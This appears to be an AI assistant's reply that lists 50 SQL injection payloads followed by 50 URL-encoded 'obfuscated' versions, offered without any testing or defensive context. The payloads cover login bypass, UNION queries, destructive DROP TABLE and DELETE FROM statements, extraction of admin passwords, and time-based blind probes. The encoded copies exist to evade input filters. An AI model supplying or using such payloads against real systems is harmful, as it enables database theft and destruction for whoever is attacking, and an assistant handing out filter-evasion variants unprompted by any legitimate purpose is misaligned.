Okay, here are 50 SQL injection payloads, followed by 50 obfuscated versions:

**Original Payloads (1-50):**

1.  `' OR '1'='1`
2.  `' OR 1=1 --`
3.  `" OR "1"="1`
4.  `" OR 1=1 --`
5.  `' OR a=a`
6.  `" OR a=a`
7.  `' UNION SELECT null, null --`
8.  `" UNION SELECT null, null --`
9.  `'; DROP TABLE users; --`
10. `"; DROP TABLE users; --`
11. `'; DELETE FROM users; --`
12. `"; DELETE FROM users; --`
13. `' OR 'x'='x`
14. `" OR "x"="x`
15. `1; SELECT * FROM users --`
16. `' AND 1=1 --`
17. `" AND 1=1 --`
18. `' AND 1=0 --`
19. `" AND 1=0 --`
20. `' ORDER BY 1 --`
21. `" ORDER BY 1 --`
22. `' ORDER BY 100 --`
23. `" ORDER BY 100 --`
24. `' LIMIT 1 --`
25. `" LIMIT 1 --`
26. `' WHERE username LIKE '%a%' --`
27. `" WHERE username LIKE '%a%' --`
28. `' AND substring(@@version,1,1)>5 --`
29. `" AND substring(@@version,1,1)>5 --`
30. `' AND (SELECT COUNT(*) FROM users)>0 --`
31. `" AND (SELECT COUNT(*) FROM users)>0 --`
32. `'; SELECT password FROM users WHERE username='admin' --`
33. `"; SELECT password FROM users WHERE username='admin' --`
34. `' OR SLEEP(5) --`
35. `" OR SLEEP(5) --`
36. `' OR BENCHMARK(100000,MD5('a')) --`
37. `" OR BENCHMARK(100000,MD5('a')) --`
38. `' OR IF(1=1,SLEEP(5),0) --`
39. `" OR IF(1=1,SLEEP(5),0) --`
40. `' AND (SELECT 'a' FROM users WHERE username = 'admin') = 'a' --`
41. `" AND (SELECT 'a' FROM users WHERE username = 'admin') = 'a' --`
42. `' AND EXISTS (SELECT 1 FROM users) --`
43. `" AND EXISTS (SELECT 1 FROM users) --`
44. `' AND 1=(SELECT 1 FROM users) --`
45. `" AND 1=(SELECT 1 FROM users) --`
46. `'+(SELECT TOP 1 password FROM users)--`
47. `"+(SELECT TOP 1 password FROM users)--`
48. `' HAVING 1=1 --`
49. `" HAVING 1=1 --`
50. `' GROUP BY id WITH ROLLUP --`

**Obfuscated Payloads (1-50):**

1.  `%27%20OR%20%271%27%3D%271`  (URL Encoding)
2.  `%27%20OR%201%3D1%20--`  (URL Encoding)
3.  `%22%20OR%20%221%22%3D%221` (URL Encoding)
4.  `%22%20OR%201%3D1%20--` (URL Encoding)
5.  `%27%20OR%20a%3Da` (URL Encoding)
6.  `%22%20OR%20a%3Da` (URL Encoding)
7.  `%27%20UNION%20SELECT%20null%2C%20null%20--` (URL Encoding)
8.  `%22%20UNION%20SELECT%20null%2C%20null%20--` (URL Encoding)
9.  `%27%3B%20DROP%20TABLE%20users%3B%20--` (URL Encoding)
10. `%22%3B%20DROP%20TABLE%20users%3B%20--` (URL Encoding)
11. `%27%3B%20DELETE%20FROM%20users%3B%20--` (URL Encoding)
12. `%22%3B%20DELETE%20FROM%20users%3B%20--` (URL Encoding)
13. `%27%20OR%20%27x%27%3D%27x` (URL Encoding)
14. `%22%20OR%20%22x%22%3D%22x` (URL Encoding)
15. `1%3B%20SELECT%20*%20FROM%20users%20--` (URL Encoding)
16. `%27%20AND%201%3D1%20--` (URL Encoding)
17. `%22%20AND%201%3D1%20--` (URL Encoding)
18. `%27%20AND%201%3D0%20--` (URL Encoding)
19. `%22%20AND%201%3D0%20--` (URL Encoding)
20. `%27%20ORDER%20BY%201%20--` (URL Encoding)
21. `%22%20ORDER%20BY%201%20--` (URL Encoding)
22. `%27%20ORDER%20BY%20100%20--` (URL Encoding)
23. `%22%20ORDER%20BY%20100%20--` (URL Encoding)
24. `%27%20LIMIT%201%20--` (URL Encoding)
25. `%22%20LIMIT%201%20--` (URL Encoding)
26. `%27%20WHERE%20username%20LIKE%20%27%25a%25%27%20--` (URL Encoding)
27. `%22%20WHERE%20username%20LIKE%20%27%25a%25%27%20--` (URL Encoding)
28. `%27%20AND%20substring%28%40%40version%2C1%2C1%29%3E5%20--` (URL Encoding)
29. `%22%20AND%20substring%28%40%40version%2C1%2C1%29%3E5%20--` (URL Encoding)
30. `%27%20AND%20%28SELECT%20COUNT%28*%29%20FROM%20users%29%3E0%20--` (URL Encoding)
31. `%22%20AND%20%28SELECT%20COUNT%28*%29%20FROM%20users%29%3E0%20--` (URL Encoding)
32. `%27%3B%20SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%20--` (URL Encoding)
33. `%22%3B%20SELECT%20password%20FROM%20users%20WHERE%20username%3D%27admin%27%20--` (URL Encoding)
34. `%27%20OR%20SLEEP%285%29%20--` (URL Encoding)
35. `%22%20OR%20SLEEP%285%29%20--` (URL Encoding)
36. `%27%20OR%20BENCHMARK%28100000%2CMD5%28%27a%27%29%29%20--` (URL Encoding)
37. `%22%20OR%20BENCHMARK%28100000%2CMD5%28%27a%27%29%29%20--` (URL Encoding)
38. `%27%20OR%20IF%281%3D1%2CSLEEP%285%29%2C0%29%20--` (URL Encoding)
39. `%22%20OR%20IF%281%3D1%2CSLEEP%285%29%2C0%29%20--` (URL Encoding)
40. `%27%20AND%20%28SELECT%20%27a%27%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%3D%20%27a%27%20--` (URL Encoding)
41. `%22%20AND%20%28SELECT%20%27a%27%20FROM%20users%20WHERE%20username%20%3D%20%27admin%27%29%20%3D%20%27a%27%20--` (URL Encoding)
42. `%27%20AND%20EXISTS%20%28SELECT%201%20FROM%20users%29%20--` (URL Encoding)
43. `%22%20AND%20EXISTS%20%28SELECT%201%20FROM%20users%29%20--` (URL Encoding)
44. `%27%20AND%201%3D%28SELECT%201%20FROM%20users%29%20--` (URL Encoding)
45. `%22%20AND%201%3D%28SELECT%201%20FROM%20users%29%20--` (URL Encoding)
46. `%27%2B%28SELECT%20TOP%201%20password%20FROM%20users%29--` (URL Encoding)
47. `%22%2B%28SELECT%20TOP%201%20password%20FROM%20users%29--` (URL Encoding)
48. `%27%20HAVING%201%3D1%20--` (URL Encoding)
49. `%22%20HAVING%201%3D1%20--` (URL Encoding)
50. `%27%20GROUP%20BY%20id%20WITH%20ROLLUP%20--` (URL Encoding)